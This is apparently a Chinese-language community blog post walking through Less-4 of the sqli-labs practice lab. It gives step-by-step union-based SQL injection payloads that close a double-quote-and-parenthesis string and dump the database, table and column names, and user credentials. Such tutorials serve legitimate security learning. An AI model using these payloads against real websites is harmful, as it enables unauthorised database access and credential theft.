AI 助理
备案控制台
开发者社区 安全 文章 正文

sqli-lab教程Less-4

2024-01-25 115
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: sqli-lab教程Less-4

less-4

sqli-lab通过各种方式(整型注入,字符注入,布尔盲注,时间盲注,堆叠注入…)爆出库表字段拿到字段值。


学习sqli注入必备语句:

查库:select schema_name from information_schema.schemata


查表:select table_name from information_schema.tables where table_schema=‘security’(此处拿security库为例)


查字段:select column_name from information_schema.columns where table_name=‘users’(此处拿users表例)


查字段的值:select username,password from security.users(此处拿username,password字段为例)


1.加双引号试探看出,此处是用双引号+单引号包裹的,使用双引号+单引号注入


2.使用- -+闭合,回显恢复


3.使用order by语句判断列数


4.发现有三列


5.使用union select联合查询,把id改成一个不存在的值使得有回显位

?id=-1") union select 1,2,3 --+



6.进行爆库操作

?id=-1") union select 1,2,database() --+



7.进行爆表操作

?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+


group_concat:将所有的数据连接进行拼接后作为一行显示


where:指定库的位置


8.进行爆字段操作

?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+



9.进行爆字段值操作

?id=-1") union select 1,2,group_concat(concat_ws('~',username,password)) from security.users --+


concat_ws(’~’,A,B)


显示为(A~B),用于区分用户名、密码


注入完成! 这是方法之一,后期会出sqlmap工具等教程…
文章标签:
安全
数据安全/隐私保护
Brucye
目录
相关文章
Brucye
|
安全
sqli-lab教程Less-8
sqli-lab教程Less-8
Brucye
217 0
Brucye
|
安全
sqli-lab教程Less-9
sqli-lab教程Less-9
Brucye
163 0
肥猪肥猪-17824
|
机器学习/深度学习 自然语言处理 运维
基于机器学习的网络安全威胁检测系统
【2月更文挑战第20天】 在数字化时代,网络安全已成为全球关注的焦点。随着攻击手段的日益复杂化,传统的安全防御措施已不足以应对新型的网络威胁。本文提出了一种基于机器学习的网络安全威胁检测系统,旨在通过智能算法提升威胁识别的准确性和效率。系统结合了多种机器学习技术,包括深度学习、异常检测和自然语言处理,以适应不同类型的网络攻击。经过严格的测试与验证,该系统显示出较传统方法更高的检出率及更低的误报率,为网络安全管理提供了一种新的解决方案。
肥猪肥猪-17824
392 1
秋说
|
网络安全
[网络安全]upload-labs Pass-15 解题详析
[网络安全]upload-labs Pass-15 解题详析
秋说
241 0
极客小俊
|
8月前
|
前端开发 JavaScript 开发者
这个被忽略的CSS:hover隐藏用法,让交互设计师都跪了
本文详细介绍了CSS中的伪类选择器`:hover`及其应用。`:hover`用于定义鼠标悬停在元素上时的样式,常见于超链接、按钮等交互场景。文章通过多个实例演示了`:hover`不仅可控制当前元素,还能影响其子元素或后代元素,但通常不适用于兄弟元素。此外,还分享了如何避免`:hover`导致的布局抖动问题,如提前设置透明边框。最后,结合实际案例展示了如何利用`:hover`实现复杂的交互效果,例如三级菜单,帮助开发者更好地掌握这一实用技巧。
极客小俊
461 1
这个被忽略的CSS:hover隐藏用法,让交互设计师都跪了
久绊A
|
7月前
|
网络协议 安全 算法
路由协议(静态路由、RIP、OSPF、BGP)
本文介绍了四种常见的路由协议:静态路由、RIP、OSPF 和 BGP。静态路由由管理员手动配置,简单安全但缺乏动态性;RIP 是距离矢量协议,适合小型网络,实现简单但收敛慢且易产生环路;OSPF 基于链路状态算法,适用于中大型网络,快速收敛且无环路,但配置复杂;BGP 是路径矢量协议,主要用于自治系统间路由选择,策略性强、稳定性高,但配置难度大且依赖人工干预。根据网络规模和需求,可选择合适的路由协议。
久绊A
1179 9
小Lee
|
IDE 开发工具 C++
Python应用中语法拼写错误
【5月更文挑战第17天】
小Lee
670 4
希望_睿智
|
Rust 安全 前端开发
30天拿下Rust之图形编程
30天拿下Rust之图形编程
希望_睿智
339 0
香甜可口草莓蛋糕
|
安全 测试技术 PHP
如何搭建 sqli-labs 靶场保姆级教程(附链接)
如何搭建 sqli-labs 靶场保姆级教程(附链接)
香甜可口草莓蛋糕
3780 0
肥猪肥猪-17824
|
机器学习/深度学习 数据采集 自然语言处理
基于机器学习的网络安全威胁检测系统
【5月更文挑战第29天】 在数字化时代,网络安全已成为一个不容忽视的问题。传统的安全防御手段往往依赖人工规则和特征匹配,难以应对日益复杂多变的网络攻击行为。本文提出了一个基于机器学习的网络安全威胁检测系统,旨在通过智能算法提高威胁识别的准确性和效率。系统利用先进的数据挖掘技术从大量网络流量中自动提取特征,并通过训练深度学习模型来识别潜在的安全威胁。本研究的创新点在于融合了自然语言处理(NLP)技术,以解析和理解网络攻击的语言模式,从而增强系统的检测能力。实验结果表明,该系统能够有效识别多种类型的网络攻击,包括钓鱼、恶意软件传播及先进持续性威胁(APT)。
肥猪肥猪-17824
251 0

热门文章

最新文章

  • 1
    2025年阿里云域名备案流程(图文详细教程)
  • 2
    PostgreSQL 最佳实践 - 逻辑增量复制(MySQL <-> PgSQL <-> PgSQL)
  • 3
    什么是视频推流和视频拉流?视频推流和视频拉流都涉及哪些技术?一文带您了解!
  • 4
    程序员如何让自己 Be Cloud Native - 配置篇
  • 5
    Javascript 文件命名规范
  • 6
    linux默认语言修改成中文,中文修改成英文
  • 7
    VMware 主IP地址:网络信息不可用
  • 8
    一文读懂 SOA 架构和微服务架构的区别
  • 9
    OkHttp 3.7源码分析(五)——连接池
  • 10
    阿里云服务器被挖矿怎么解决
  • 1
    阿里云服务器ECS自定义购买流程:超详细新手入门教程
    179
  • 2
    阿里云服务器100M固定带宽收费标准:一年、1个月和1小时费用价格
    170
  • 3
    《多账号同源识别核心技术拆解:从行为指纹到身份锚定的实操逻辑》
    45
  • 4
    运维数据分析:别再只会翻日志了,真正的价值在“洞察”
    55
  • 5
    《高价值付费玩家行为共性深析:从体验锚定到价值共生的实操拆解》
    42
  • 6
    别再拍脑袋扩容了:用 ML 做容量预测,才是云成本和性能的最优解
    55
  • 7
    别再全量拉表了兄弟:一篇讲透增量数据处理与 CDC 的实战指南
    46
  • 8
    Java Stream API:让集合操作变得优雅
    160
  • 9
    Java Stream API:告别繁琐循环,拥抱优雅集合操作
    84
  • 10
    掌握Java Stream API:让集合操作更优雅
    23

    • 相关电子书

    更多
  • 低代码开发师(初级)实战教程
  • 冬季实战营第三期:MySQL数据库进阶实战
  • 阿里巴巴DevOps 最佳实践手册
    • 下一篇
    「直播预告」Streaming Lakehouse Meetup EP.2|Paimon × StarRocks 共话实时湖仓